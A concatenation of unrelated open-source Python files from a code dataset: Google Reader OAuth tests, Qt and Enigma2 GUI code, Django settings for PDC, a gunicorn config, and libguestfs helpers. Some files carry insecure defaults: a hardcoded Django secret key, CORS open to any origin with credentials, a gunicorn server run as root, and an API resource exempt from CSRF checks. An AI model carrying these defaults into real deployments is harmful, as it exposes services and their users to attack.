2. redirected back to oauth approval page. br.submit() should choose the
first submit on that page, which is the "Accept" button
3. mechanize follows the redirect, and should throw 40X exception and
we return the token
"""
br = mechanize.Browser()
br.open(url)
br.select_form(nr=0)
br["Email"] = username
br["Passwd"] = password
try:
response1 = br.submit()
br.select_form(nr=0)
response2 = br.submit()
except Exception as e:
#watch for 40X exception on trying to load redirect page
pass
callback_url = br.geturl()
# split off the token in hackish fashion
return callback_url.split('code=')[1]
def automated_oauth2_approval(url):
"""
general process is:
1. assume user isn't logged in, so get redirected to google accounts
login page. login using account credentials
2. get redirected to oauth approval screen
3. authorize oauth app
"""
auth_url = url
headers = {'Referer': auth_url}
s = requests.Session()
r1 = s.get(auth_url)
post_data = dict((x[0],x[1]) for x in re.findall('name="(.*?)".*?value="(.*?)"', str(r1.content), re.MULTILINE))
post_data['Email'] = username
post_data['Passwd'] = password
post_data['timeStmp'] = ''
post_data['secTok'] = ''
post_data['signIn'] = 'Sign in'
post_data['GALX'] = s.cookies['GALX']
r2 = s.post('https://accounts.google.com/ServiceLoginAuth', data=post_data, headers=headers, allow_redirects=False)
    # requests mangles the url encoding and double-encodes ampersands
scope_url = r2.headers['location'].replace('amp%3B','')
# now get auth screen
r3 = s.get(scope_url)
# unless we have already authed!
if 'asktherelic' in r3.url:
code = r3.url.split('=')[1]
return code
post_data = dict((x[0],x[1]) for x in re.findall('name="(.*?)".*?value="(.*?)"', str(r3.content)))
post_data['submit_access'] = 'true'
post_data['_utf8'] = '☃'
    # again, repair the mangled encoding for amp;
action_url = re.findall('action="(.*?)"', str(r3.content))[0].replace('amp;','')
r4 = s.post(action_url, data=post_data, headers=headers, allow_redirects=False)
code = r4.headers['Location'].split('=')[1]
s.close()
return code
@unittest.skipIf("client_id" not in globals(), 'OAuth2 config not setup')
class TestOAuth2(unittest.TestCase):
def test_full_auth_and_access_userdata(self):
auth = OAuth2Method(client_id, client_secret)
auth.setRedirectUri(redirect_url)
url = auth.buildAuthUrl()
token = automated_oauth2_approval(url)
auth.code = token
auth.setAccessToken()
reader = GoogleReader(auth)
info = reader.getUserInfo()
self.assertEqual(dict, type(info))
self.assertEqual(firstname, info['userName'])
def test_oauth_subscribe(self):
auth = OAuth2Method(client_id, client_secret)
auth.setRedirectUri(redirect_url)
url = auth.buildAuthUrl()
token = automated_oauth2_approval(url)
auth.code = token
auth.setAccessToken()
auth.setActionToken()
reader = GoogleReader(auth)
slashdot = 'feed/http://rss.slashdot.org/Slashdot/slashdot'
#unsubscribe always return true; revert feedlist state
self.assertTrue(reader.unsubscribe(slashdot))
# now subscribe
self.assertTrue(reader.subscribe(slashdot))
# wait for server to update
import time
time.sleep(1)
reader.buildSubscriptionList()
# test subscribe successful
self.assertIn(slashdot, [x.id for x in reader.getSubscriptionList()])
if __name__ == '__main__':
unittest.main()
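# Run note (illustrative): these tests expect a tests/config.py that defines
# username, password and firstname and, for OAuth2, client_id, client_secret
# and redirect_url, ideally for a throwaway Google account.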
| askedrelic/libgreader | tests/test_auth.py | Python | mit | 7,823 |
from .model import NetworkModel
from .view import NetworkView
from PyQt5.QtWidgets import QAction, QMenu
from PyQt5.QtGui import QCursor, QDesktopServices
from PyQt5.QtCore import pyqtSlot, QUrl, QObject
from duniterpy.api import bma
from duniterpy.documents import BMAEndpoint
class NetworkController(QObject):
"""
The network panel
"""
def __init__(self, parent, view, model):
"""
Constructor of the navigation component
        :param sakia.gui.network.view.NetworkView view: the view
:param sakia.gui.network.model.NetworkModel model: the model
"""
super().__init__(parent)
self.view = view
self.model = model
table_model = self.model.init_network_table_model()
self.view.set_network_table_model(table_model)
self.view.manual_refresh_clicked.connect(self.refresh_nodes_manually)
self.view.table_network.customContextMenuRequested.connect(self.node_context_menu)
@classmethod
def create(cls, parent, app, network_service):
"""
:param PyQt5.QObject parent:
:param sakia.app.Application app:
:param sakia.services.NetworkService network_service:
:return:
"""
        view = NetworkView(parent.view)
        model = NetworkModel(None, app, network_service)
        network = cls(parent, view, model)
        model.setParent(network)
        return network
def refresh_nodes_manually(self):
self.model.refresh_nodes_once()
def node_context_menu(self, point):
index = self.view.table_network.indexAt(point)
valid, node = self.model.table_model_data(index)
if self.model.app.parameters.expert_mode:
menu = QMenu()
open_in_browser = QAction(self.tr("Open in browser"), self)
open_in_browser.triggered.connect(self.open_node_in_browser)
open_in_browser.setData(node)
menu.addAction(open_in_browser)
# Show the context menu.
menu.exec_(QCursor.pos())
@pyqtSlot()
def set_root_node(self):
node = self.sender().data()
self.model.add_root_node(node)
@pyqtSlot()
def unset_root_node(self):
node = self.sender().data()
self.model.unset_root_node(node)
@pyqtSlot()
def open_node_in_browser(self):
node = self.sender().data()
bma_endpoints = [e for e in node.endpoints if isinstance(e, BMAEndpoint)]
if bma_endpoints:
conn_handler = next(bma_endpoints[0].conn_handler())
peering_url = bma.API(conn_handler, bma.network.URL_PATH).reverse_url(conn_handler.http_scheme, '/peering')
url = QUrl(peering_url)
QDesktopServices.openUrl(url)
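# Illustrative wiring (caller names are assumptions): the panel is built via
# the factory classmethod rather than the constructor, e.g.
#
#     controller = NetworkController.create(navigation, app, network_service)
#     layout.addWidget(controller.view)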
| ucoin-io/cutecoin | src/sakia/gui/navigation/network/controller.py | Python | mit | 2,750 |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='Unirest',
version='1.1.7',
author='Mashape',
author_email='[email protected]',
packages=['unirest'],
url='https://github.com/Mashape/unirest-python',
license='LICENSE',
description='Simplified, lightweight HTTP client library',
install_requires=[
"poster >= 0.8.1"
]
)
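# Illustrative install commands for this package:
#     pip install Unirest
#     python setup.py install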
| abhishekgahlot/unirest-python | setup.py | Python | mit | 431 |
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
#-*- coding: utf-8 -*-
import sys
import utils
sys.modules['piston.utils'] = utils
from piston.resource import Resource
class CsrfExemptResource(Resource):
"""A Custom Resource that is csrf exempt"""
def __init__(self, handler, authentication=None):
super(CsrfExemptResource, self).__init__(handler, authentication)
self.csrf_exempt = getattr(self.handler, 'csrf_exempt', True)
def __call__(self, request, *args, **kwargs):
res = super(CsrfExemptResource, self).__call__(
request, *args, **kwargs)
if hasattr(self.handler, 'status'):
res.status_code = self.handler.status
del self.handler.status
return res
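# Minimal usage sketch (handler class and urlconf are assumptions): piston
# resources are callable views, so this drops straight into a Django 1.x
# urlconf.
#
#     auth_resource = CsrfExemptResource(handler=AccountHandler)
#     urlpatterns = patterns('', (r'^api/account$', auth_resource))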
| nuwainfo/treeio | core/api/resource.py | Python | mit | 815 |
#
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
"""
Django settings for pdc project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3hm)=^*sowhxr%m)%_u3mk+!ncy=c)147xbevej%l_lcdogu#+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
ITEMS_PER_PAGE = 50
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'corsheaders',
'pdc.apps.auth',
'pdc.apps.common',
'pdc.apps.compose',
'pdc.apps.package',
'pdc.apps.release',
'pdc.apps.repository',
'pdc.apps.contact',
'pdc.apps.component',
'pdc.apps.changeset',
'pdc.apps.utils',
'pdc.apps.bindings',
'pdc.apps.usage',
'pdc.apps.osbs',
'mptt',
)
AUTH_USER_MODEL = 'kerb_auth.User'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'pdc.apps.auth.authentication.TokenAuthenticationWithChangeSet',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissions'
],
'DEFAULT_METADATA_CLASS': 'contrib.bulk_operations.metadata.BulkMetadata',
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'pdc.apps.common.renderers.ReadOnlyBrowsableAPIRenderer',
),
'EXCEPTION_HANDLER': 'pdc.apps.common.handlers.exception_handler',
'DEFAULT_PAGINATION_CLASS': 'pdc.apps.common.pagination.AutoDetectedPageNumberPagination',
'NON_FIELD_ERRORS_KEY': 'detail',
}
MIDDLEWARE_CLASSES = (
'corsheaders.middleware.CorsMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'pdc.apps.auth.middleware.RemoteUserMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'kobo.django.menu.middleware.MenuMiddleware',
'pdc.apps.usage.middleware.UsageMiddleware',
'pdc.apps.changeset.middleware.ChangesetMiddleware',
'pdc.apps.utils.middleware.MessagingMiddleware',
)
AUTHENTICATION_BACKENDS = (
'pdc.apps.auth.backends.KerberosUserBackend',
#'pdc.apps.auth.backends.AuthMellonUserBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/auth/krb5login'
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'pdc.urls'
import kobo
ROOT_MENUCONF = "pdc.menu"
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, "pdc/templates"),
os.path.join(os.path.dirname(kobo.__file__), "hub", "templates"),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'kobo.django.menu.context_processors.menu_context_processor',
],
},
},
]
WSGI_APPLICATION = 'pdc.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = '/usr/share/pdc/static'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "pdc/static"),
"/usr/share/patternfly1/resources",
)
REST_API_URL = 'rest_api/'
REST_API_VERSION = 'v1'
REST_API_PAGE_SIZE = 20
REST_API_PAGE_SIZE_QUERY_PARAM = 'page_size'
REST_API_MAX_PAGE_SIZE = 100
API_HELP_TEMPLATE = "api/help.html"
DIST_GIT_WEB_ROOT_URL = "http://pkgs.example.com/cgit/"
DIST_GIT_RPM_PATH = 'rpms/'
DIST_GIT_REPO_FORMAT = DIST_GIT_WEB_ROOT_URL + DIST_GIT_RPM_PATH + "%s"
DIST_GIT_BRANCH_FORMAT = "?h=%s"
# ldap settings
LDAP_URI = "ldap://ldap.example.com:389"
LDAP_USERS_DN = "ou=users,dc=example,dc=com"
LDAP_GROUPS_DN = "ou=groups,dc=example,dc=com"
LDAP_CACHE_HOURS = 24
#
# CORS settings
#
# The requests can come from any origin (hostname). If this is undesirable, use
# settings_local.py module, set this to False and either set
# CORS_ORIGIN_WHITELIST to a tuple of hostnames that are allowed to contact the
# API, or set CORS_ORIGIN_REGEX_WHITELIST, which again is a tuple of regular
# expressions.
CORS_ORIGIN_ALLOW_ALL = True
# Only the REST API can be accessed. If settings local override REST_API_URL,
# make sure to update this setting as well.
CORS_URLS_REGEX = '^/%s.*$' % REST_API_URL
# We want HTML/JS clients to be able to use Kerberos authentication.
CORS_ALLOW_CREDENTIALS = True
# Allow default headers from django-cors-headers package as well as
# PDC-Change-Comment custom header.
CORS_ALLOW_HEADERS = (
'x-requested-with',
'content-type',
'accept',
'origin',
'authorization',
'x-csrftoken',
'pdc-change-comment',
)
# mock kerberos login for debugging
DEBUG_USER = None
BROWSABLE_DOCUMENT_MACROS = {
    # needs to be replaced with the real host name on deployment.
    'HOST_NAME': 'http://localhost:8000',
    # keep consistent with the REST API root.
'API_PATH': '%s%s' % (REST_API_URL, REST_API_VERSION),
}
EMPTY_PATCH_ERROR_RESPONSE = {
'detail': 'Partial update with no changes does not make much sense.',
    'hint': ' '.join(['Please make sure the URL includes the trailing slash.',
                      'Some software may automatically redirect you to the',
                      'correct URL but not forward the request body.'])
}
INTERNAL_SERVER_ERROR_RESPONSE = {
'detail': 'The server encountered an internal error or misconfiguration and was unable to complete your request.'
}
# Messaging Bus Config
MESSAGE_BUS = {
# MLP: Messaging Library Package
# e.g. `fedmsg` for fedmsg or `kombu` for AMQP and other transports that `kombu` supports.
# `stomp` for STOMP supports.
'MLP': '',
# # `fedmsg` config example:
# # fedmsg's config is managed by `fedmsg` package, so normally here just need to set the
# # 'MLP' to 'fedmsg'
# 'MLP': 'fedmsg',
#
# # `kombu` config example:
# 'MLP': 'kombu',
# 'URL': 'amqp://guest:[email protected]:5672//',
# 'EXCHANGE': {
# 'name': 'pdc',
# 'type': 'topic',
# 'durable': False
# },
# 'OPTIONS': {
# # Set these two items to config `kombu` to use ssl.
# 'login_method': 'EXTERNAL',
# 'ssl': {
# 'ca_certs': '',
# 'keyfile': '',
# 'certfile': '',
# 'cert_reqs': ssl.CERT_REQUIRED,
# }
# }
#
# # `stomp` config items:
# 'MLP': 'stomp',
# 'HOST_AND_PORTS': [
# ('stomp.example1.com', 61613),
# ('stomp.example2.com', 61613),
# ('stomp.example3.com', 61613),
# ],
# 'TOPIC': 'pdc',
# 'CERT_FILE': '',
# 'KEY_FILE': '',
}
# ======== Email configuration =========
# Email addresses who would like to receive email
ADMINS = (('PDC Dev', '[email protected]'),)
# Email SMTP HOST configuration
EMAIL_HOST = 'smtp.example.com'
# Email sender's address
SERVER_EMAIL = '[email protected]'
EMAIL_SUBJECT_PREFIX = '[PDC]'
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(asctime)s %(process)d [%(filename)s -- %(module)s.%(funcName)s:%(lineno)d] [%(levelname)s]- %(message)s'
},
},
'handlers': {
'stderr': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
'stream': sys.stderr
},
'stdout': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
'stream': sys.stdout
},
'watchedfile': {
'level': 'INFO',
'class': 'logging.handlers.WatchedFileHandler',
'formatter': 'verbose',
'filename': '/var/log/pdc/server.log',
'delay': True,
},
# Send a warning email if we want it.
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'include_html': True,
}
},
'loggers': {
'pdc': {
'handlers': ['stderr'],
'level': 'INFO',
},
'django.request': {
'handlers': ['stderr'],
'level': 'ERROR',
'propagate': False,
}
}
}
# Attempts to import server specific settings.
# Note that all server specific settings should go to 'settings_local.py'
try:
from settings_local import * # noqa
except ImportError:
pass
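# Example settings_local.py override (illustrative values only):
#
#     DEBUG = True
#     ALLOWED_HOSTS = ['pdc.example.com']
#     DATABASES = {'default': {'ENGINE': 'django.db.backends.postgresql_psycopg2',
#                              'NAME': 'pdc'}}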
if 'pdc.apps.bindings' in INSTALLED_APPS:
WITH_BINDINGS = True
else:
WITH_BINDINGS = False
| xychu/product-definition-center | pdc/settings.py | Python | mit | 10,354 |
#coding:utf-8
bind = 'unix:/var/run/gunicorn.sock'
workers = 4
# change this to an unprivileged user in production
user = 'root'
# 'debug' is very verbose; 'error' is a sensible production level
loglevel = 'debug'
errorlog = '-'
logfile = '/var/log/gunicorn/debug.log'
timeout = 300
secure_scheme_headers = {
'X-SCHEME': 'https',
}
x_forwarded_for_header = 'X-FORWARDED-FOR'
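# Typically launched with something like (the module path is an assumption):
#     gunicorn -c settings.py app:application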
| chenke91/ckPermission | settings.py | Python | mit | 313 |
# from . import *
| benjaminjack/pinetree | tests/models/__init__.py | Python | mit | 18 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.paging import Paged
class USqlViewPaged(Paged):
"""
    A paging container for iterating over a list of USqlView objects
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[USqlView]'}
}
def __init__(self, *args, **kwargs):
super(USqlViewPaged, self).__init__(*args, **kwargs)
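# A Paged container is iterable and fetches follow-up pages via next_link;
# illustrative consumption (how `result` is obtained is client-specific):
#
#     for usql_view in result:
#         print(usql_view)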
| SUSE/azure-sdk-for-python | azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/catalog/models/usql_view_paged.py | Python | mit | 874 |
"""
libguestfs tools test utility functions.
"""
import logging
from autotest.client import os_dep, utils
from autotest.client.shared import error
import propcan
class LibguestfsCmdError(Exception):
"""
Error of libguestfs-tool command.
"""
def __init__(self, details=''):
self.details = details
Exception.__init__(self)
def __str__(self):
return str(self.details)
def lgf_cmd_check(cmd):
"""
To check whether the cmd is supported on this host.
@param cmd: the cmd to use a libguest tool.
@return: None if the cmd is not exist, otherwise return its path.
"""
libguestfs_cmds = ['libguestfs_test_tool', 'guestfish', 'guestmount',
'virt-alignment-scan', 'virt-cat', 'virt-copy-in',
'virt-copy-out', 'virt-df', 'virt-edit',
'virt-filesystems', 'virt-format', 'virt-inspector',
'virt-list-filesystems', 'virt-list-partitions',
'virt-ls', 'virt-make-fs', 'virt-rescue',
'virt-resize', 'virt-sparsify', 'virt-sysprep',
'virt-tar', 'virt-tar-in', 'virt-tar-out',
'virt-win-reg']
if not (cmd in libguestfs_cmds):
raise LibguestfsCmdError("Command %s is not supported by libguestfs yet." % cmd)
try:
return os_dep.command(cmd)
except ValueError:
logging.warning("You have not installed %s on this host.", cmd)
return None
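# Illustrative check before building a command ('guestfish' is in the
# supported list above):
#
#     if lgf_cmd_check('guestfish'):
#         ...build and run a guestfish command line...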
def lgf_command(cmd, **dargs):
"""
Interface of libguestfs tools' commands.
@param cmd: Command line to execute.
@param dargs: standardized command keywords.
@return: CmdResult object.
@raise: LibguestfsCmdError if non-zero exit status
and ignore_status=False
"""
ignore_status = dargs.get('ignore_status', True)
debug = dargs.get('debug', False)
timeout = dargs.get('timeout', 60)
if debug:
logging.debug("Running command %s in debug mode.", cmd)
# Raise exception if ignore_status == False
try:
ret = utils.run(cmd, ignore_status=ignore_status,
verbose=debug, timeout=timeout)
except error.CmdError, detail:
raise LibguestfsCmdError(detail)
if debug:
logging.debug("status: %s", ret.exit_status)
logging.debug("stdout: %s", ret.stdout.strip())
logging.debug("stderr: %s", ret.stderr.strip())
# Return CmdResult instance when ignore_status is True
return ret
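# Illustrative call (the image path is an assumption):
#
#     result = lgf_command("guestfish -a /tmp/test.img run", debug=True)
#     if result.exit_status == 0:
#         print result.stdout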
class LibguestfsBase(propcan.PropCanBase):
"""
Base class of libguestfs tools.
"""
__slots__ = ('ignore_status', 'debug', 'timeout')
def __init__(self, *args, **dargs):
init_dict = dict(*args, **dargs)
init_dict['ignore_status'] = init_dict.get('ignore_status', True)
init_dict['debug'] = init_dict.get('debug', False)
init_dict['timeout'] = init_dict.get('timeout', 60)
super(LibguestfsBase, self).__init__(init_dict)
def set_ignore_status(self, ignore_status):
"""
Enforce setting ignore_status as a boolean.
"""
if bool(ignore_status):
self.dict_set('ignore_status', True)
else:
self.dict_set('ignore_status', False)
def set_debug(self, debug):
"""
Accessor method for 'debug' property that logs message on change
"""
if not self.INITIALIZED:
self.dict_set('debug', debug)
else:
current_setting = self.dict_get('debug')
desired_setting = bool(debug)
if not current_setting and desired_setting:
self.dict_set('debug', True)
logging.debug("Libguestfs debugging enabled")
# current and desired could both be True
if current_setting and not desired_setting:
self.dict_set('debug', False)
logging.debug("Libguestfs debugging disabled")
def libguest_test_tool_cmd(qemuarg=None, qemudirarg=None,
timeoutarg=None, **dargs):
"""
    Execute libguestfs-test-tool command.
@param qemuarg: the qemu option
@param qemudirarg: the qemudir option
@param timeoutarg: the timeout option
@return: a CmdResult object
@raise: raise LibguestfsCmdError
"""
cmd = "libguest-test-tool"
if qemuarg is not None:
cmd += " --qemu '%s'" % qemuarg
if qemudirarg is not None:
cmd += " --qemudir '%s'" % qemudirarg
if timeoutarg is not None:
cmd += " --timeout %s" % timeoutarg
# Allow to raise LibguestfsCmdError if ignore_status is False.
return lgf_command(cmd, **dargs)
def virt_edit_cmd(disk_or_domain, file_path, options=None,
extra=None, expr=None, **dargs):
"""
Execute virt-edit command to check whether it is ok.
Since virt-edit will need uses' interact, maintain and return
a session if there is no raise after command has been executed.
@param disk_or_domain: a img path or a domain name.
@param file_path: the file need to be edited in img file.
@param options: the options of virt-edit.
@param extra: additional suffix of command.
@return: a session of executing virt-edit command.
"""
# disk_or_domain and file_path are necessary parameters.
cmd = "virt-edit '%s' '%s'" % (disk_or_domain, file_path)
if options is not None:
cmd += " %s" % options
if extra is not None:
cmd += " %s" % extra
if expr is not None:
cmd += " -e '%s'" % expr
return lgf_command(cmd, **dargs)
| rbbratta/virt-test | virttest/utils_libguestfs.py | Python | gpl-2.0 | 5,627 |
from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen, ConfigList
from Components.ActionMap import ActionMap
from Components.Sources.StaticText import StaticText
from Components.config import config, ConfigSubsection, ConfigBoolean, getConfigListEntry, ConfigSelection, ConfigYesNo, ConfigIP
from Components.Network import iNetwork
from Components.Ipkg import IpkgComponent
from enigma import eDVBDB
config.misc.installwizard = ConfigSubsection()
config.misc.installwizard.hasnetwork = ConfigBoolean(default = False)
config.misc.installwizard.ipkgloaded = ConfigBoolean(default = False)
config.misc.installwizard.channellistdownloaded = ConfigBoolean(default = False)
class InstallWizard(Screen, ConfigListScreen):
STATE_UPDATE = 0
STATE_CHOISE_CHANNELLIST = 1
STATE_CHOISE_SOFTCAM = 2
def __init__(self, session, args = None):
Screen.__init__(self, session)
self.index = args
self.list = []
ConfigListScreen.__init__(self, self.list)
if self.index == self.STATE_UPDATE:
config.misc.installwizard.hasnetwork.value = False
config.misc.installwizard.ipkgloaded.value = False
modes = {0: " "}
self.enabled = ConfigSelection(choices = modes, default = 0)
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getAdapterList()]
is_found = False
for x in self.adapters:
if x[1] == 'eth0' or x[1] == 'eth1':
if iNetwork.getAdapterAttribute(x[1], 'up'):
self.ipConfigEntry = ConfigIP(default = iNetwork.getAdapterAttribute(x[1], "ip"))
iNetwork.checkNetworkState(self.checkNetworkCB)
						is_found = True
else:
iNetwork.restartNetwork(self.checkNetworkLinkCB)
break
if is_found is False:
self.createMenu()
elif self.index == self.STATE_CHOISE_CHANNELLIST:
self.enabled = ConfigYesNo(default = True)
modes = {"openxta": "XTA(13e-19e)", "19e": "Astra 1", "23e": "Astra 3", "19e-23e": "Astra 1 Astra 3", "19e-23e-28e": "Astra 1 Astra 2 Astra 3", "13e-19e-23e-28e": "Astra 1 Astra 2 Astra 3 Hotbird"}
self.channellist_type = ConfigSelection(choices = modes, default = "openxta")
self.createMenu()
elif self.index == self.STATE_CHOISE_SOFTCAM:
self.enabled = ConfigYesNo(default = True)
modes = {"cccam": _("default") + " (CCcam)", "scam": "scam"}
self.softcam_type = ConfigSelection(choices = modes, default = "cccam")
self.createMenu()
def checkNetworkCB(self, data):
if data < 3:
config.misc.installwizard.hasnetwork.value = True
self.createMenu()
def checkNetworkLinkCB(self, retval):
if retval:
iNetwork.checkNetworkState(self.checkNetworkCB)
else:
self.createMenu()
def createMenu(self):
try:
test = self.index
except:
return
self.list = []
if self.index == self.STATE_UPDATE:
if config.misc.installwizard.hasnetwork.value:
self.list.append(getConfigListEntry(_("Your internet connection is working (ip: %s)") % (self.ipConfigEntry.getText()), self.enabled))
else:
self.list.append(getConfigListEntry(_("Your receiver does not have an internet connection"), self.enabled))
elif self.index == self.STATE_CHOISE_CHANNELLIST:
self.list.append(getConfigListEntry(_("Install channel list"), self.enabled))
if self.enabled.value:
self.list.append(getConfigListEntry(_("Channel list type"), self.channellist_type))
elif self.index == self.STATE_CHOISE_SOFTCAM:
self.list.append(getConfigListEntry(_("Install softcam"), self.enabled))
if self.enabled.value:
self.list.append(getConfigListEntry(_("Softcam type"), self.softcam_type))
self["config"].list = self.list
self["config"].l.setList(self.list)
def keyLeft(self):
if self.index == 0:
return
ConfigListScreen.keyLeft(self)
self.createMenu()
def keyRight(self):
if self.index == 0:
return
ConfigListScreen.keyRight(self)
self.createMenu()
def run(self):
if self.index == self.STATE_UPDATE:
if config.misc.installwizard.hasnetwork.value:
self.session.open(InstallWizardIpkgUpdater, self.index, _('Please wait (updating packages)'), IpkgComponent.CMD_UPDATE)
elif self.index == self.STATE_CHOISE_CHANNELLIST and self.enabled.value:
self.session.open(InstallWizardIpkgUpdater, self.index, _('Please wait (downloading channel list)'), IpkgComponent.CMD_REMOVE, {'package': 'enigma2-plugin-settings-henksat-' + self.channellist_type.value})
elif self.index == self.STATE_CHOISE_SOFTCAM and self.enabled.value:
self.session.open(InstallWizardIpkgUpdater, self.index, _('Please wait (downloading softcam)'), IpkgComponent.CMD_INSTALL, {'package': 'enigma2-plugin-softcams-' + self.softcam_type.value})
return
class InstallWizardIpkgUpdater(Screen):
skin = """
<screen position="c-300,c-25" size="600,50" title=" ">
<widget source="statusbar" render="Label" position="10,5" zPosition="10" size="e-10,30" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, index, info, cmd, pkg = None):
self.skin = InstallWizardIpkgUpdater.skin
Screen.__init__(self, session)
self["statusbar"] = StaticText(info)
self.pkg = pkg
self.index = index
self.state = 0
self.ipkg = IpkgComponent()
self.ipkg.addCallback(self.ipkgCallback)
if self.index == InstallWizard.STATE_CHOISE_CHANNELLIST:
self.ipkg.startCmd(cmd, {'package': 'enigma2-plugin-settings-*'})
else:
self.ipkg.startCmd(cmd, pkg)
def ipkgCallback(self, event, param):
if event == IpkgComponent.EVENT_DONE:
if self.index == InstallWizard.STATE_UPDATE:
config.misc.installwizard.ipkgloaded.value = True
elif self.index == InstallWizard.STATE_CHOISE_CHANNELLIST:
if self.state == 0:
self.ipkg.startCmd(IpkgComponent.CMD_INSTALL, self.pkg)
self.state = 1
return
else:
config.misc.installwizard.channellistdownloaded.value = True
eDVBDB.getInstance().reloadBouquets()
eDVBDB.getInstance().reloadServicelist()
self.close()
| XTAv2/Enigma2 | lib/python/Screens/InstallWizard.py | Python | gpl-2.0 | 5,974 |
# collect data about max memory usage of processes matching some patterns
import psutil, re, operator, time, sys
sampleTime=.5 # seconds
# matching lines will be taken into account
#cmdPattern='.*cc1plus.*src/([a-zA-Z0-9_-]\.cpp).*'
cmdPattern=r'.*cc1plus.* (\S+/)?([^/ ]+\.cpp).*'
# group in the pattern which identifies the process (e.g. source code file)
cmdKeyGroup=2
maxMem={}
while True:
try:
for p in psutil.process_iter():
m=re.match(cmdPattern,' '.join(p.cmdline))
if not m: continue
key=m.group(cmdKeyGroup)
			mem=p.get_memory_info()[1] # (RSS,VMS) tuple; [1] selects virtual memory size
if key not in maxMem:
print 'New process with key',key
maxMem[key]=mem
elif maxMem[key]<mem: maxMem[key]=mem
time.sleep(sampleTime)
except (KeyboardInterrupt,SystemExit):
# print summary, exit
for k,v in sorted(maxMem.iteritems(),key=operator.itemgetter(1)):
print '{:>10.1f} {}'.format(1e-6*v,k)
sys.exit(0)
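# Usage note (illustrative): start this script, run the build you want to
# profile (e.g. make -j4) in another shell, then hit Ctrl-C here to print
# the per-file peak memory table.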
| tarthy6/dozer-thesis | scripts/watch-mem-usage.py | Python | gpl-2.0 | 965 |
"""Service layer (domain model) of practice app
"""
| effa/flocs | practice/services/__init__.py | Python | gpl-2.0 | 53 |
from enigma import eListboxPythonMultiContent, gFont, eEnv, getBoxType
from boxbranding import getMachineBrand, getMachineName
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Components.MenuList import MenuList
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.Network import iNetwork
from Components.NimManager import nimmanager
from Components.SystemInfo import SystemInfo
from Screens.Screen import Screen
from Screens.NetworkSetup import *
from Screens.About import About
from Screens.PluginBrowser import PluginDownloadBrowser, PluginFilter, PluginBrowser
from Screens.LanguageSelection import LanguageSelection
from Screens.Satconfig import NimSelection
from Screens.ScanSetup import ScanSimple, ScanSetup
from Screens.Setup import Setup, getSetupTitle
from Screens.HarddiskSetup import HarddiskSelection, HarddiskFsckSelection, HarddiskConvertExt4Selection
from Screens.SkinSelector import LcdSkinSelector
from Screens.VideoMode import VideoSetup
from Plugins.Plugin import PluginDescriptor
